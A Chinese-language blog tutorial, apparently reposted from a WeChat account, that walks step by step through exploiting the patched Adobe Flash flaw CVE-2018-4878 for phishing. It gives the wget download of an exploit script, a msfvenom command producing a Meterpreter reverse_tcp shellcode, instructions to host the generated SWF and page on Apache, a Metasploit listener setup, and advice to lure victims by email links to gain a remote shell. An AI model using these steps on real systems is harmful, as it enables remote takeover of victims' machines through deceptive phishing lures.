Adobe Flash Player社工钓鱼

admin 2023年3月26日17:31:18评论46 views字数 1306阅读4分21秒阅读模式

文章前言

本篇文章主要介绍如何通过利用Adobe Flash Player的漏洞进行社工钓鱼,该漏洞目前已被修复,在实战中利用已不太奏效,仅作为学习

钓鱼实践

影响范围

Adobe Flash Player<=28.0.0.137

漏洞简介

2018年2月1号,Adobe官方发布安全通报(APSA18-01),声明Adobe Flash 28.0.0.137及其之前的版本,存在高危漏洞,攻击者可以通过构造特殊的Flash链接,之后诱导用户用浏览器/邮件/Office访问此Flash链接,从而实现"远程代码执行",并且直接被Getshell,该漏洞于2017年底由韩国计算机应急小组(KR-CERT)首次发现

Adobe Flash Player社工钓鱼

演示环境
  • 攻击主机:Kali Linux

  • 目标主机:Windows 7 sp1

  • 漏洞载荷:CVE-2018-4878.py

  • flash版本:flashplayer_activex_28.0.0.137.exe

钓鱼演示

Step 1:下载漏洞利用脚本

wget https://raw.githubusercontent.com/backlion/demo/master/CVE-2018-4878.rar

Adobe Flash Player社工钓鱼

Adobe Flash Player社工钓鱼

Step 2:修改载荷,将代码中的stageless变量改成"stageless = False"

Adobe Flash Player社工钓鱼

Step 3:使用msf生成shellcode

msfvenom -p  windows/meterpreter/reverse_tcp  lhost=192.168.174.131 lport=5678  -f  python>shellcode.txt

Adobe Flash Player社工钓鱼

Step 4:之替换CVE-2018-4878中的shellcode

Adobe Flash Player社工钓鱼

Step 5:修改CVE-2018-4878.py下面的文件信息

Adobe Flash Player社工钓鱼

Step 6:使用Python执行CVE-2018-4878.py代码,之后生成exploit.swf文件和index.html文件

Adobe Flash Player社工钓鱼

Step 7:之后在Kali Linux开启Apache2服务,并将上面的2个文件放入/var/www/html目录中(Apache web路径)

Adobe Flash Player社工钓鱼

Step 8:Kali Linux开启Shell会话监听

msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp msf exploit(handler) > set lhost 192.168.174.131msf exploit(handler) > set lport 5678 msf exploit(handler) > exploit

Adobe Flash Player社工钓鱼

Step 9:诱导用户通过IE浏览器访问页面

Adobe Flash Player社工钓鱼

Adobe Flash Player社工钓鱼

Step 10:Kali Linux 上获取meterpreter shell:

Adobe Flash Player社工钓鱼

文末小结

从上面的演示中可以看到最终由于Flash存在CVE-2018-4878高危漏洞,导致Windows靶机访问含flash的页面时,直接被Kali Linux控制,真实环境下,很多黑客基于此Flash漏洞,结合社会工程学,例如将网页链接放置在诱导邮件中,欺骗大量用户点击,来达到最规模攻击效果

原文始发于微信公众号(七芒星实验室):Adobe Flash Player社工钓鱼

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年3月26日17:31:18
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Adobe Flash Player社工钓鱼https://cn-sec.com/archives/1629301.html

发表评论

匿名网友 填写信息